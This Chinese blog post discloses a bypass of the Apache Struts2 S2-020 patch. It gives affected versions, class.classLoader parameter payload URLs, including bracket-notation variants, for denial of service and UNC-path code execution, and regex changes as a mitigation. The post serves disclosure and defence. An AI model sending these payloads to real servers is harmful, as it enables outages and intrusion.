SPRITEKING

Apache STRUTS2 S2-020补丁绕过漏洞

时间:公元14-08-08 栏目:WEB APP, 安全 作者:SPRITEKING 吐槽:0 被黑客围观: 2,231 次





Apache STRUTS2 S2-020补丁绕过漏洞

tomcat

危害级别

受影响系统

DOS影响范围:
Apache Tomcat 8.0.0-RC1 to 8.0.1
Apache Tomcat 7.0.0 to 7.0.50
Apache Tomcat 6

ClassLoader manipulation 影响范围:
Apache Struts versions 2.0.0-2.3.16版本

补丁被绕过

以下补丁还是被绕过,造成Apache struts2 0day
https://github.com/apache/struts/commit/aaf5a3010e3c11ae14e3d3c966a53ebab67146be

危害

造成拒绝服务,特定条件下(服务器的操作系统支持UNC path)可通过映射共享主机目录造成远程代码执行。

利用代码:

http://www.domain.com/index.action?class.classLoader.resources.dirContext.docBase=不存在的路径

绕过方法:

http://www.domain.com/index.action?class['classLoader']['resources']['dirContext']['docBase']=不存在的路径

远程命令执行原利用方法:

http://www.domain.com/index.action?class.classLoader.resources.dirContext.docBase=映射主机共享目录

绕过方法:

http://www.domain.com/index.action?class['classLoader']['resources']['dirContext']['docBase']=映射主机共享目录

test

翰海源提出较为严格的临时解决方案

原补丁

https://github.com/apache/struts/commit/aaf5a3010e3c11ae14e3d3c966a53ebab67146be

替换所有的 ^dojo\..*
改为 (.*\.|^)class.*,^dojo\..*

update:2014-04-24 14:38
之前的修复方案修复的不彻底,可被绕过
替换所有的 ^dojo\..*
改为 .*(class|Class).*,^dojo\..*

 http://blog.vulnhunt.com/index.php/2014/04/24/apache_struts2_0day/

声明: 本文由( SPRITEKING )原创编译,转载请保留链接: Apache STRUTS2 S2-020补丁绕过漏洞

Apache STRUTS2 S2-020补丁绕过漏洞:等您坐沙发呢!

发表评论


Time

新浪微博

音乐

为您推荐